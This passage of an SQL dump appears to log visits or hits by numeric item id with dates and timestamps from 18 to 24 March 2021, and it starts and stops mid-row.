13:58:12'),(16738,68,1,'2021-03-18','2021-03-18 13:59:48'),(16739,89,1,'2021-03-18','2021-03-18 14:01:21'),(16740,89,1,'2021-03-18','2021-03-18 14:01:25'),(16741,1582,1,'2021-03-18','2021-03-18 14:01:42'),(16742,3083,1,'2021-03-18','2021-03-18 14:02:38'),(16743,89,1,'2021-03-18','2021-03-18 14:02:44'),(16744,1588,1,'2021-03-18','2021-03-18 14:03:52'),(16745,68,1,'2021-03-18','2021-03-18 14:04:17'),(16746,68,1,'2021-03-18','2021-03-18 14:04:21'),(16747,76,1,'2021-03-18','2021-03-18 14:04:25'),(16748,3083,1,'2021-03-18','2021-03-18 14:04:36'),(16749,89,1,'2021-03-18','2021-03-18 14:04:59'),(16750,467,1,'2021-03-18','2021-03-18 14:05:07'),(16751,2503,1,'2021-03-18','2021-03-18 14:05:24'),(16752,3498,1,'2021-03-18','2021-03-18 14:05:54'),(16753,2503,1,'2021-03-18','2021-03-18 14:06:36'),(16754,487,1,'2021-03-18','2021-03-18 14:06:40'),(16755,471,1,'2021-03-18','2021-03-18 14:08:11'),(16756,1586,1,'2021-03-18','2021-03-18 14:08:26'),(16757,487,1,'2021-03-18','2021-03-18 14:08:41'),(16758,468,1,'2021-03-18','2021-03-18 14:09:53'),(16759,474,1,'2021-03-18','2021-03-18 14:10:06'),(16760,2503,1,'2021-03-18','2021-03-18 14:16:44'),(16761,470,1,'2021-03-18','2021-03-18 14:21:02'),(16762,2309,1,'2021-03-18','2021-03-18 14:40:03'),(16763,1614,1,'2021-03-18','2021-03-18 14:57:28'),(16764,1766,1,'2021-03-18','2021-03-18 15:34:59'),(16765,1586,1,'2021-03-18','2021-03-18 15:37:41'),(16766,2617,1,'2021-03-18','2021-03-18 15:39:31'),(16767,2503,1,'2021-03-18','2021-03-18 16:11:15'),(16768,1600,1,'2021-03-18','2021-03-18 16:14:00'),(16769,91,1,'2021-03-18','2021-03-18 17:05:16'),(16770,1586,1,'2021-03-18','2021-03-18 18:17:23'),(16771,1586,1,'2021-03-18','2021-03-18 18:17:26'),(16772,1586,1,'2021-03-18','2021-03-18 18:17:27'),(16773,2150,1,'2021-03-18','2021-03-18 18:19:13'),(16774,2150,1,'2021-03-18','2021-03-18 18:19:14'),(16775,1586,1,'2021-03-18','2021-03-18 18:21:00'),(16776,1713,1,'2021-03-18','2021-03-18 18:21:30'),(16777,1713,1,'2021-03-18','2021-03-18 18:21:30'),(16778,1713,1,'2021-03-18','2021-03-18 18:21:32'),(16779,1586,1,'2021-03-18','2021-03-18 18:22:13'),(16780,1703,1,'2021-03-18','2021-03-18 18:22:41'),(16781,1703,1,'2021-03-18','2021-03-18 18:22:41'),(16782,1588,1,'2021-03-18','2021-03-18 18:51:25'),(16783,80,1,'2021-03-18','2021-03-18 18:52:23'),(16784,80,1,'2021-03-18','2021-03-18 18:58:58'),(16785,570,1,'2021-03-18','2021-03-18 19:22:09'),(16786,2769,1,'2021-03-18','2021-03-18 20:03:56'),(16787,1586,1,'2021-03-18','2021-03-18 20:52:09'),(16788,470,1,'2021-03-18','2021-03-18 21:07:33'),(16789,1602,1,'2021-03-18','2021-03-18 21:16:57'),(16790,3092,1,'2021-03-18','2021-03-18 21:46:48'),(16791,3058,1,'2021-03-18','2021-03-18 21:47:03'),(16792,1544,1,'2021-03-18','2021-03-18 22:14:47'),(16793,1544,1,'2021-03-18','2021-03-18 22:14:49'),(16794,1602,1,'2021-03-18','2021-03-18 22:16:25'),(16795,1602,1,'2021-03-18','2021-03-18 22:16:28'),(16796,68,1,'2021-03-18','2021-03-18 22:19:52'),(16797,68,1,'2021-03-18','2021-03-18 22:19:52'),(16798,1606,1,'2021-03-19','2021-03-19 00:07:51'),(16799,1594,1,'2021-03-19','2021-03-19 00:09:55'),(16800,1594,1,'2021-03-19','2021-03-19 00:10:52'),(16801,2159,1,'2021-03-19','2021-03-19 00:57:50'),(16802,3079,1,'2021-03-19','2021-03-19 01:14:04'),(16803,3030,1,'2021-03-19','2021-03-19 03:08:24'),(16804,1586,1,'2021-03-19','2021-03-19 08:22:22'),(16805,76,1,'2021-03-19','2021-03-19 08:22:48'),(16806,1586,1,'2021-03-19','2021-03-19 09:00:22'),(16807,3030,1,'2021-03-19','2021-03-19 09:36:12'),(16808,2617,1,'2021-03-19','2021-03-19 10:03:05'),(16809,1598,1,'2021-03-19','2021-03-19 10:32:02'),(16810,570,1,'2021-03-19','2021-03-19 10:36:49'),(16811,570,1,'2021-03-19','2021-03-19 10:50:44'),(16812,3058,1,'2021-03-19','2021-03-19 11:10:31'),(16813,2503,1,'2021-03-19','2021-03-19 11:33:35'),(16814,1586,1,'2021-03-19','2021-03-19 11:58:28'),(16815,1774,1,'2021-03-19','2021-03-19 12:30:40'),(16816,1586,1,'2021-03-19','2021-03-19 13:14:56'),(16817,1614,1,'2021-03-19','2021-03-19 13:54:47'),(16818,1614,1,'2021-03-19','2021-03-19 14:07:03'),(16819,1602,1,'2021-03-19','2021-03-19 14:08:03'),(16820,1586,1,'2021-03-19','2021-03-19 14:27:39'),(16821,2904,1,'2021-03-19','2021-03-19 14:54:45'),(16822,1582,1,'2021-03-19','2021-03-19 15:01:29'),(16823,91,1,'2021-03-19','2021-03-19 15:10:51'),(16824,3092,1,'2021-03-19','2021-03-19 15:11:49'),(16825,3034,1,'2021-03-19','2021-03-19 15:16:27'),(16826,1582,1,'2021-03-19','2021-03-19 15:21:59'),(16827,108,1,'2021-03-19','2021-03-19 15:22:28'),(16828,76,1,'2021-03-19','2021-03-19 15:24:41'),(16829,68,1,'2021-03-19','2021-03-19 15:25:14'),(16830,87,1,'2021-03-19','2021-03-19 15:25:30'),(16831,481,1,'2021-03-19','2021-03-19 15:26:36'),(16832,80,1,'2021-03-19','2021-03-19 15:27:10'),(16833,481,1,'2021-03-19','2021-03-19 15:30:24'),(16834,87,1,'2021-03-19','2021-03-19 15:30:28'),(16835,68,1,'2021-03-19','2021-03-19 15:30:29'),(16836,76,1,'2021-03-19','2021-03-19 15:30:31'),(16837,108,1,'2021-03-19','2021-03-19 15:30:36'),(16838,1582,1,'2021-03-19','2021-03-19 15:30:39'),(16839,1582,1,'2021-03-19','2021-03-19 15:30:57'),(16840,1602,1,'2021-03-19','2021-03-19 15:49:55'),(16841,87,1,'2021-03-19','2021-03-19 15:51:56'),(16842,1602,1,'2021-03-19','2021-03-19 15:53:28'),(16843,1586,1,'2021-03-19','2021-03-19 16:27:19'),(16844,1870,1,'2021-03-19','2021-03-19 16:42:23'),(16845,3053,1,'2021-03-19','2021-03-19 16:59:20'),(16846,1582,1,'2021-03-19','2021-03-19 17:07:30'),(16847,80,1,'2021-03-19','2021-03-19 18:16:56'),(16848,570,1,'2021-03-19','2021-03-19 18:49:38'),(16849,1588,1,'2021-03-19','2021-03-19 18:54:17'),(16850,1598,1,'2021-03-19','2021-03-19 19:09:53'),(16851,1586,1,'2021-03-19','2021-03-19 19:21:02'),(16852,1612,1,'2021-03-19','2021-03-19 19:30:39'),(16853,2503,1,'2021-03-19','2021-03-19 20:26:24'),(16854,108,1,'2021-03-19','2021-03-19 20:33:14'),(16855,1544,1,'2021-03-19','2021-03-19 20:51:43'),(16856,2457,1,'2021-03-19','2021-03-19 20:56:12'),(16857,2309,1,'2021-03-19','2021-03-19 22:25:04'),(16858,2296,1,'2021-03-19','2021-03-19 22:38:05'),(16859,3092,1,'2021-03-19','2021-03-19 22:39:10'),(16860,1586,1,'2021-03-19','2021-03-19 23:36:14'),(16861,1606,1,'2021-03-20','2021-03-20 00:33:15'),(16862,1606,1,'2021-03-20','2021-03-20 02:15:58'),(16863,1732,1,'2021-03-20','2021-03-20 03:23:29'),(16864,1608,1,'2021-03-20','2021-03-20 03:42:34'),(16865,1608,1,'2021-03-20','2021-03-20 03:45:01'),(16866,1608,1,'2021-03-20','2021-03-20 03:45:18'),(16867,91,1,'2021-03-20','2021-03-20 04:05:11'),(16868,1606,1,'2021-03-20','2021-03-20 04:11:56'),(16869,3072,1,'2021-03-20','2021-03-20 05:43:27'),(16870,2775,1,'2021-03-20','2021-03-20 06:18:43'),(16871,2309,1,'2021-03-20','2021-03-20 06:34:24'),(16872,1586,1,'2021-03-20','2021-03-20 06:44:36'),(16873,1709,1,'2021-03-20','2021-03-20 07:01:12'),(16874,1544,1,'2021-03-20','2021-03-20 07:43:17'),(16875,1582,1,'2021-03-20','2021-03-20 07:53:56'),(16876,2503,1,'2021-03-20','2021-03-20 08:03:16'),(16877,2161,1,'2021-03-20','2021-03-20 10:48:04'),(16878,2161,1,'2021-03-20','2021-03-20 10:48:21'),(16879,2161,1,'2021-03-20','2021-03-20 10:48:28'),(16880,1720,1,'2021-03-20','2021-03-20 11:29:00'),(16881,108,1,'2021-03-20','2021-03-20 12:55:23'),(16882,1606,1,'2021-03-20','2021-03-20 13:35:47'),(16883,1586,1,'2021-03-20','2021-03-20 14:09:11'),(16884,2309,1,'2021-03-20','2021-03-20 14:29:05'),(16885,3072,1,'2021-03-20','2021-03-20 14:36:09'),(16886,1602,1,'2021-03-20','2021-03-20 15:00:36'),(16887,3038,1,'2021-03-20','2021-03-20 15:36:38'),(16888,1598,1,'2021-03-20','2021-03-20 15:38:25'),(16889,1720,1,'2021-03-20','2021-03-20 16:26:53'),(16890,1544,1,'2021-03-20','2021-03-20 16:26:56'),(16891,1604,1,'2021-03-20','2021-03-20 16:47:49'),(16892,76,1,'2021-03-20','2021-03-20 16:48:31'),(16893,76,1,'2021-03-20','2021-03-20 16:50:37'),(16894,76,1,'2021-03-20','2021-03-20 16:52:51'),(16895,1600,1,'2021-03-20','2021-03-20 18:41:13'),(16896,1586,1,'2021-03-20','2021-03-20 18:43:10'),(16897,1602,1,'2021-03-20','2021-03-20 19:37:02'),(16898,1699,1,'2021-03-20','2021-03-20 20:48:29'),(16899,2503,1,'2021-03-20','2021-03-20 21:19:10'),(16900,1606,1,'2021-03-20','2021-03-20 22:19:12'),(16901,3038,1,'2021-03-20','2021-03-20 22:59:41'),(16902,2159,1,'2021-03-20','2021-03-20 23:01:47'),(16903,1602,1,'2021-03-20','2021-03-20 23:09:32'),(16904,2159,1,'2021-03-20','2021-03-20 23:11:39'),(16905,87,1,'2021-03-20','2021-03-20 23:12:03'),(16906,108,1,'2021-03-20','2021-03-20 23:19:57'),(16907,3072,1,'2021-03-20','2021-03-20 23:39:58'),(16908,3482,1,'2021-03-21','2021-03-21 00:58:59'),(16909,68,1,'2021-03-21','2021-03-21 01:00:26'),(16910,3482,1,'2021-03-21','2021-03-21 01:01:26'),(16911,1612,1,'2021-03-21','2021-03-21 01:01:56'),(16912,80,1,'2021-03-21','2021-03-21 01:05:03'),(16913,80,1,'2021-03-21','2021-03-21 01:57:42'),(16914,1544,1,'2021-03-21','2021-03-21 02:01:12'),(16915,3038,1,'2021-03-21','2021-03-21 06:02:58'),(16916,1606,1,'2021-03-21','2021-03-21 06:33:09'),(16917,68,1,'2021-03-21','2021-03-21 06:41:05'),(16918,1606,1,'2021-03-21','2021-03-21 08:23:33'),(16919,1582,1,'2021-03-21','2021-03-21 08:34:25'),(16920,1582,1,'2021-03-21','2021-03-21 08:34:38'),(16921,1544,1,'2021-03-21','2021-03-21 08:46:48'),(16922,2503,1,'2021-03-21','2021-03-21 09:13:38'),(16923,108,1,'2021-03-21','2021-03-21 09:23:32'),(16924,3038,1,'2021-03-21','2021-03-21 10:03:42'),(16925,3072,1,'2021-03-21','2021-03-21 10:03:44'),(16926,1774,1,'2021-03-21','2021-03-21 10:28:25'),(16927,1699,1,'2021-03-21','2021-03-21 10:35:01'),(16928,1774,1,'2021-03-21','2021-03-21 10:47:10'),(16929,2309,1,'2021-03-21','2021-03-21 11:08:48'),(16930,2309,1,'2021-03-21','2021-03-21 11:53:02'),(16931,2904,1,'2021-03-21','2021-03-21 12:55:49'),(16932,1544,1,'2021-03-21','2021-03-21 13:55:33'),(16933,1594,1,'2021-03-21','2021-03-21 14:04:49'),(16934,1606,1,'2021-03-21','2021-03-21 15:35:53'),(16935,2457,1,'2021-03-21','2021-03-21 15:41:04'),(16936,2457,1,'2021-03-21','2021-03-21 15:46:17'),(16937,2457,1,'2021-03-21','2021-03-21 16:10:10'),(16938,3261,1,'2021-03-21','2021-03-21 16:10:49'),(16939,2159,1,'2021-03-21','2021-03-21 16:38:33'),(16940,2457,1,'2021-03-21','2021-03-21 17:11:31'),(16941,1606,1,'2021-03-21','2021-03-21 17:16:40'),(16942,2309,1,'2021-03-21','2021-03-21 17:34:22'),(16943,1602,1,'2021-03-21','2021-03-21 17:35:35'),(16944,2309,1,'2021-03-21','2021-03-21 17:37:03'),(16945,108,1,'2021-03-21','2021-03-21 17:44:21'),(16946,1720,1,'2021-03-21','2021-03-21 17:56:35'),(16947,80,1,'2021-03-21','2021-03-21 17:58:49'),(16948,1586,1,'2021-03-21','2021-03-21 18:18:34'),(16949,80,1,'2021-03-21','2021-03-21 18:19:17'),(16950,335,1,'2021-03-21','2021-03-21 18:23:07'),(16951,2159,1,'2021-03-21','2021-03-21 18:51:45'),(16952,2457,1,'2021-03-21','2021-03-21 18:54:04'),(16953,1586,1,'2021-03-21','2021-03-21 19:08:01'),(16954,2309,1,'2021-03-21','2021-03-21 19:23:42'),(16955,3072,1,'2021-03-21','2021-03-21 19:27:17'),(16956,1600,1,'2021-03-21','2021-03-21 19:57:01'),(16957,2457,1,'2021-03-21','2021-03-21 20:01:13'),(16958,1586,1,'2021-03-21','2021-03-21 20:46:35'),(16959,1586,1,'2021-03-21','2021-03-21 20:47:25'),(16960,1586,1,'2021-03-21','2021-03-21 20:54:52'),(16961,80,1,'2021-03-21','2021-03-21 20:55:03'),(16962,1586,1,'2021-03-21','2021-03-21 20:55:23'),(16963,1586,1,'2021-03-21','2021-03-21 21:02:41'),(16964,1582,1,'2021-03-21','2021-03-21 21:40:27'),(16965,2159,1,'2021-03-21','2021-03-21 21:56:57'),(16966,2904,1,'2021-03-21','2021-03-21 22:53:45'),(16967,570,1,'2021-03-21','2021-03-21 22:55:44'),(16968,3265,1,'2021-03-21','2021-03-21 23:24:27'),(16969,1582,1,'2021-03-21','2021-03-21 23:26:44'),(16970,1592,1,'2021-03-21','2021-03-21 23:34:24'),(16971,2159,1,'2021-03-22','2021-03-22 00:44:46'),(16972,1586,1,'2021-03-22','2021-03-22 00:59:20'),(16973,1586,1,'2021-03-22','2021-03-22 00:59:40'),(16974,2309,1,'2021-03-22','2021-03-22 01:17:56'),(16975,2309,1,'2021-03-22','2021-03-22 02:45:25'),(16976,472,1,'2021-03-22','2021-03-22 03:08:18'),(16977,2309,1,'2021-03-22','2021-03-22 03:16:58'),(16978,1600,1,'2021-03-22','2021-03-22 03:26:32'),(16979,80,1,'2021-03-22','2021-03-22 03:30:52'),(16980,80,1,'2021-03-22','2021-03-22 03:32:19'),(16981,1586,1,'2021-03-22','2021-03-22 04:28:05'),(16982,1604,1,'2021-03-22','2021-03-22 04:37:38'),(16983,80,1,'2021-03-22','2021-03-22 04:45:44'),(16984,1600,1,'2021-03-22','2021-03-22 04:56:04'),(16985,2159,1,'2021-03-22','2021-03-22 05:16:46'),(16986,1604,1,'2021-03-22','2021-03-22 05:30:30'),(16987,1586,1,'2021-03-22','2021-03-22 05:40:35'),(16988,2769,1,'2021-03-22','2021-03-22 05:46:29'),(16989,1582,1,'2021-03-22','2021-03-22 05:56:34'),(16990,3058,1,'2021-03-22','2021-03-22 06:08:36'),(16991,1586,1,'2021-03-22','2021-03-22 06:36:39'),(16992,2609,1,'2021-03-22','2021-03-22 06:46:37'),(16993,1602,1,'2021-03-22','2021-03-22 07:06:46'),(16994,570,1,'2021-03-22','2021-03-22 07:17:02'),(16995,3087,1,'2021-03-22','2021-03-22 07:26:24'),(16996,1718,1,'2021-03-22','2021-03-22 07:58:02'),(16997,3287,1,'2021-03-22','2021-03-22 09:16:33'),(16998,2309,1,'2021-03-22','2021-03-22 09:17:52'),(16999,1602,1,'2021-03-22','2021-03-22 09:35:04'),(17000,3285,1,'2021-03-22','2021-03-22 09:46:43'),(17001,3285,1,'2021-03-22','2021-03-22 09:48:32'),(17002,1594,1,'2021-03-22','2021-03-22 09:50:08'),(17003,2159,1,'2021-03-22','2021-03-22 09:56:55'),(17004,3030,1,'2021-03-22','2021-03-22 10:01:02'),(17005,1598,1,'2021-03-22','2021-03-22 10:06:59'),(17006,2159,1,'2021-03-22','2021-03-22 10:10:37'),(17007,1606,1,'2021-03-22','2021-03-22 10:12:39'),(17008,3058,1,'2021-03-22','2021-03-22 10:16:48'),(17009,468,1,'2021-03-22','2021-03-22 10:17:04'),(17010,72,1,'2021-03-22','2021-03-22 10:24:13'),(17011,72,1,'2021-03-22','2021-03-22 10:27:13'),(17012,72,1,'2021-03-22','2021-03-22 10:33:09'),(17013,3181,1,'2021-03-22','2021-03-22 10:33:17'),(17014,1602,1,'2021-03-22','2021-03-22 10:34:22'),(17015,1602,1,'2021-03-22','2021-03-22 10:36:09'),(17016,1588,1,'2021-03-22','2021-03-22 10:36:27'),(17017,3181,1,'2021-03-22','2021-03-22 10:36:53'),(17018,1594,1,'2021-03-22','2021-03-22 10:54:57'),(17019,3041,1,'2021-03-22','2021-03-22 11:08:50'),(17020,2309,1,'2021-03-22','2021-03-22 11:26:40'),(17021,2769,1,'2021-03-22','2021-03-22 11:46:42'),(17022,1600,1,'2021-03-22','2021-03-22 12:16:25'),(17023,2457,1,'2021-03-22','2021-03-22 12:39:31'),(17024,1608,1,'2021-03-22','2021-03-22 12:42:05'),(17025,3030,1,'2021-03-22','2021-03-22 12:53:09'),(17026,1604,1,'2021-03-22','2021-03-22 13:10:02'),(17027,68,1,'2021-03-22','2021-03-22 13:10:21'),(17028,76,1,'2021-03-22','2021-03-22 13:11:22'),(17029,76,1,'2021-03-22','2021-03-22 13:12:47'),(17030,68,1,'2021-03-22','2021-03-22 13:12:58'),(17031,1586,1,'2021-03-22','2021-03-22 13:41:47'),(17032,1608,1,'2021-03-22','2021-03-22 14:33:42'),(17033,1606,1,'2021-03-22','2021-03-22 14:40:52'),(17034,84,1,'2021-03-22','2021-03-22 14:41:23'),(17035,84,1,'2021-03-22','2021-03-22 14:41:57'),(17036,1596,1,'2021-03-22','2021-03-22 14:44:36'),(17037,1596,1,'2021-03-22','2021-03-22 14:46:46'),(17038,76,1,'2021-03-22','2021-03-22 15:02:06'),(17039,2457,1,'2021-03-22','2021-03-22 15:26:28'),(17040,1586,1,'2021-03-22','2021-03-22 15:30:19'),(17041,1586,1,'2021-03-22','2021-03-22 15:37:31'),(17042,1604,1,'2021-03-22','2021-03-22 15:47:34'),(17043,3058,1,'2021-03-22','2021-03-22 15:57:33'),(17044,1604,1,'2021-03-22','2021-03-22 15:57:39'),(17045,80,1,'2021-03-22','2021-03-22 15:58:38'),(17046,2159,1,'2021-03-22','2021-03-22 16:18:40'),(17047,1596,1,'2021-03-22','2021-03-22 16:25:25'),(17048,1596,1,'2021-03-22','2021-03-22 16:25:42'),(17049,1602,1,'2021-03-22','2021-03-22 16:57:25'),(17050,1582,1,'2021-03-22','2021-03-22 17:17:35'),(17051,3482,1,'2021-03-22','2021-03-22 17:42:16'),(17052,72,1,'2021-03-22','2021-03-22 17:43:16'),(17053,3482,1,'2021-03-22','2021-03-22 17:43:30'),(17054,1612,1,'2021-03-22','2021-03-22 17:44:02'),(17055,72,1,'2021-03-22','2021-03-22 17:44:47'),(17056,1612,1,'2021-03-22','2021-03-22 17:45:44'),(17057,68,1,'2021-03-22','2021-03-22 17:45:50'),(17058,1612,1,'2021-03-22','2021-03-22 17:46:11'),(17059,89,1,'2021-03-22','2021-03-22 17:46:40'),(17060,1612,1,'2021-03-22','2021-03-22 17:46:57'),(17061,1612,1,'2021-03-22','2021-03-22 17:48:22'),(17062,68,1,'2021-03-22','2021-03-22 17:48:41'),(17063,1612,1,'2021-03-22','2021-03-22 17:48:51'),(17064,89,1,'2021-03-22','2021-03-22 17:50:41'),(17065,89,1,'2021-03-22','2021-03-22 17:51:07'),(17066,89,1,'2021-03-22','2021-03-22 17:51:27'),(17067,91,1,'2021-03-22','2021-03-22 17:51:58'),(17068,570,1,'2021-03-22','2021-03-22 17:58:09'),(17069,1602,1,'2021-03-22','2021-03-22 18:04:28'),(17070,1602,1,'2021-03-22','2021-03-22 18:06:31'),(17071,2159,1,'2021-03-22','2021-03-22 18:28:14'),(17072,1598,1,'2021-03-22','2021-03-22 18:48:33'),(17073,1582,1,'2021-03-22','2021-03-22 19:08:25'),(17074,1614,1,'2021-03-22','2021-03-22 19:28:15'),(17075,2609,1,'2021-03-22','2021-03-22 19:58:24'),(17076,2309,1,'2021-03-22','2021-03-22 20:28:46'),(17077,1598,1,'2021-03-22','2021-03-22 21:47:16'),(17078,1598,1,'2021-03-22','2021-03-22 21:47:56'),(17079,80,1,'2021-03-22','2021-03-22 21:51:43'),(17080,2769,1,'2021-03-22','2021-03-22 21:55:24'),(17081,3489,1,'2021-03-22','2021-03-22 22:20:11'),(17082,3034,1,'2021-03-22','2021-03-22 23:09:55'),(17083,1612,1,'2021-03-22','2021-03-22 23:25:20'),(17084,2748,1,'2021-03-22','2021-03-22 23:34:07'),(17085,1766,1,'2021-03-22','2021-03-22 23:50:01'),(17086,2748,1,'2021-03-23','2021-03-23 00:01:14'),(17087,3127,1,'2021-03-23','2021-03-23 00:35:18'),(17088,1586,1,'2021-03-23','2021-03-23 00:40:11'),(17089,1600,1,'2021-03-23','2021-03-23 00:56:13'),(17090,1600,1,'2021-03-23','2021-03-23 01:11:06'),(17091,3030,1,'2021-03-23','2021-03-23 01:20:35'),(17092,2769,1,'2021-03-23','2021-03-23 01:30:39'),(17093,1604,1,'2021-03-23','2021-03-23 01:40:26'),(17094,1600,1,'2021-03-23','2021-03-23 01:49:10'),(17095,1600,1,'2021-03-23','2021-03-23 01:49:20'),(17096,2159,1,'2021-03-23','2021-03-23 01:50:37'),(17097,2609,1,'2021-03-23','2021-03-23 02:20:25'),(17098,108,1,'2021-03-23','2021-03-23 04:41:00'),(17099,2297,1,'2021-03-23','2021-03-23 06:22:37'),(17100,1598,1,'2021-03-23','2021-03-23 07:26:34'),(17101,1606,1,'2021-03-23','2021-03-23 07:41:58'),(17102,2309,1,'2021-03-23','2021-03-23 08:16:41'),(17103,80,1,'2021-03-23','2021-03-23 08:39:49'),(17104,80,1,'2021-03-23','2021-03-23 08:41:49'),(17105,1602,1,'2021-03-23','2021-03-23 08:53:40'),(17106,1602,1,'2021-03-23','2021-03-23 08:53:42'),(17107,1602,1,'2021-03-23','2021-03-23 08:53:45'),(17108,1586,1,'2021-03-23','2021-03-23 09:38:52'),(17109,1586,1,'2021-03-23','2021-03-23 09:39:03'),(17110,1594,1,'2021-03-23','2021-03-23 10:15:31'),(17111,2769,1,'2021-03-23','2021-03-23 10:25:05'),(17112,2769,1,'2021-03-23','2021-03-23 10:25:07'),(17113,2775,1,'2021-03-23','2021-03-23 10:26:48'),(17114,2775,1,'2021-03-23','2021-03-23 10:26:49'),(17115,1594,1,'2021-03-23','2021-03-23 10:36:52'),(17116,84,1,'2021-03-23','2021-03-23 10:45:07'),(17117,1877,1,'2021-03-23','2021-03-23 10:50:50'),(17118,1586,1,'2021-03-23','2021-03-23 11:07:02'),(17119,1588,1,'2021-03-23','2021-03-23 11:16:30'),(17120,1586,1,'2021-03-23','2021-03-23 11:17:33'),(17121,1707,1,'2021-03-23','2021-03-23 11:18:54'),(17122,1598,1,'2021-03-23','2021-03-23 11:25:02'),(17123,3280,1,'2021-03-23','2021-03-23 11:31:50'),(17124,87,1,'2021-03-23','2021-03-23 11:32:38'),(17125,488,1,'2021-03-23','2021-03-23 11:32:57'),(17126,87,1,'2021-03-23','2021-03-23 11:33:19'),(17127,3280,1,'2021-03-23','2021-03-23 11:33:30'),(17128,1582,1,'2021-03-23','2021-03-23 12:37:10'),(17129,2769,1,'2021-03-23','2021-03-23 13:05:05'),(17130,1596,1,'2021-03-23','2021-03-23 13:26:39'),(17131,2457,1,'2021-03-23','2021-03-23 14:06:29'),(17132,2769,1,'2021-03-23','2021-03-23 14:19:58'),(17133,2775,1,'2021-03-23','2021-03-23 14:20:20'),(17134,2769,1,'2021-03-23','2021-03-23 14:20:34'),(17135,1602,1,'2021-03-23','2021-03-23 14:27:28'),(17136,1602,1,'2021-03-23','2021-03-23 14:29:13'),(17137,1592,1,'2021-03-23','2021-03-23 14:30:21'),(17138,1602,1,'2021-03-23','2021-03-23 14:32:56'),(17139,2309,1,'2021-03-23','2021-03-23 14:43:50'),(17140,1598,1,'2021-03-23','2021-03-23 15:16:03'),(17141,2159,1,'2021-03-23','2021-03-23 15:35:26'),(17142,1588,1,'2021-03-23','2021-03-23 15:35:33'),(17143,1582,1,'2021-03-23','2021-03-23 15:39:41'),(17144,1602,1,'2021-03-23','2021-03-23 15:49:45'),(17145,91,1,'2021-03-23','2021-03-23 15:52:38'),(17146,2159,1,'2021-03-23','2021-03-23 15:59:31'),(17147,1600,1,'2021-03-23','2021-03-23 16:07:38'),(17148,87,1,'2021-03-23','2021-03-23 16:23:11'),(17149,468,1,'2021-03-23','2021-03-23 16:23:47'),(17150,474,1,'2021-03-23','2021-03-23 16:24:31'),(17151,87,1,'2021-03-23','2021-03-23 16:24:58'),(17152,474,1,'2021-03-23','2021-03-23 16:25:19'),(17153,474,1,'2021-03-23','2021-03-23 16:25:28'),(17154,108,1,'2021-03-23','2021-03-23 16:25:36'),(17155,108,1,'2021-03-23','2021-03-23 16:30:02'),(17156,108,1,'2021-03-23','2021-03-23 16:30:47'),(17157,2297,1,'2021-03-23','2021-03-23 17:05:20'),(17158,108,1,'2021-03-23','2021-03-23 18:03:32'),(17159,2309,1,'2021-03-23','2021-03-23 19:00:43'),(17160,2309,1,'2021-03-23','2021-03-23 19:30:29'),(17161,2154,1,'2021-03-23','2021-03-23 20:23:34'),(17162,1586,1,'2021-03-23','2021-03-23 20:30:26'),(17163,1592,1,'2021-03-23','2021-03-23 21:59:25'),(17164,1592,1,'2021-03-23','2021-03-23 22:00:43'),(17165,2297,1,'2021-03-23','2021-03-23 22:30:50'),(17166,1614,1,'2021-03-23','2021-03-23 23:12:01'),(17167,3045,1,'2021-03-24','2021-03-24 00:47:25'),(17168,2297,1,'2021-03-24','2021-03-24 03:54:48'),(17169,2297,1,'2021-03-24','2021-03-24 04:02:30'),(17170,1596,1,'2021-03-24','2021-03-24 05:43:45'),(17171,2457,1,'2021-03-24','2021-03-24 06:44:45'),(17172,2609,1,'2021-03-24','2021-03-24 06:55:50'),(17173,87,1,'2021-03-24','2021-03-24 07:03:03'),(17174,467,1,'2021-03-24','2021-03-24 07:03:17'),(17175,473,1,'2021-03-24','2021-03-24 07:03:27'),(17176,2154,1,'2021-03-24','2021-03-24 07:27:49'),(17177,1600,1,'2021-03-24','2021-03-24 07:29:49'),(17178,2154,1,'2021-03-24','2021-03-24 08:03:53'),(17179,3087,1,'2021-03-24','2021-03-24 08:05:37'),(17180,3096,1,'2021-03-24','2021-03-24 08:07:22'),(17181,1594,1,'2021-03-24','2021-03-24 09:28:04'),(17182,68,1,'2021-03-24','2021-03-24 09:29:06'),(17183,80,1,'2021-03-24','2021-03-24 09:29:53'),(17184,2419,1,'2021-03-24','2021-03-24 09:30:24'),(17185,80,1,'2021-03-24','2021-03-24 09:32:19'),(17186,68,1,'2021-03-24','2021-03-24 09:32:35'),(17187,1594,1,'2021-03-24','2021-03-24 09:32:39'),(17188,2609,1,'2021-03-24','2021-03-24 10:56:12'),(17189,1608,1,'2021-03-24','2021-03-24 10:58:11'),(17190,1600,1,'2021-03-24','2021-03-24 11:47:59'),(17191,3109,1,'2021-03-24','2021-03-24 11:58:38'),(17192,1600,1,'2021-03-24','2021-03-24 11:59:09'),(17193,1602,1,'2021-03-24','2021-03-24 12:10:50'),(17194,1602,1,'2021-03-24','2021-03-24 12:50:40'),(17195,1608,1,'2021-03-24','2021-03-24 12:58:37'),(17196,1602,1,'2021-03-24','2021-03-24 12:59:12'),(17197,87,1,'2021-03-24','2021-03-24 13:00:17'),(17198,1606,1,'2021-03-24','2021-03-24 13:41:47'),(17199,2159,1,'2021-03-24','2021-03-24 14:28:36'),(17200,3482,1,'2021-03-24','2021-03-24 15:50:58'),(17201,91,1,'2021-03-24','2021-03-24 15:53:19'),(17202,76,1,'2021-03-24','2021-03-24 15:53:44'),(17203,68,1,'2021-03-24','2021-03-24 15:54:10'),(17204,76,1,'2021-03-24','2021-03-24 15:54:24'),(17205,473,1,'2021-03-24','2021-03-24 15:58:16'),(17206,68,1,'2021-03-24','2021-03-24 16:01:42'),(17207,473,1,'2021-03-24','2021-03-24 16:02:20'),(17208,89,1,'2021-03-24','2021-03-24 16:06:03'),(17209,1544,1,'2021-03-24','2021-03-24 16:09:37'),(17210,1582,1,'2021-03-24','2021-03-24 16:19:19'),(17211,87,1,'2021-03-24','2021-03-24 16:20:42'),(17212,483,1,'2021-03-24','2021-03-24 16:21:26'),(17213,87,1,'2021-03-24','2021-03-24 16:21:43'),(17214,2309,1,'2021-03-24','2021-03-24 16:24:21'),(17215,3482,1,'2021-03-24','2021-03-24 16:27:24'),(17216,2154,1,'2021-03-24','2021-03-24 16:30:08'),(17217,74,1,'2021-03-24','2021-03-24 16:34:20'),(17218,2503,1,'2021-03-24','2021-03-24 16:34:42'),(17219,2503,1,'2021-03-24','2021-03-24 16:35:16'),(17220,473,1,'2021-03-24','2021-03-24 16:35:46'),(17221,89,1,'2021-03-24','2021-03-24 16:36:10'),(17222,2297,1,'2021-03-24','2021-03-24 16:38:02'),(17223,1594,1,'2021-03-24','2021-03-24 16:42:55'),(17224,1614,1,'2021-03-24','2021-03-24 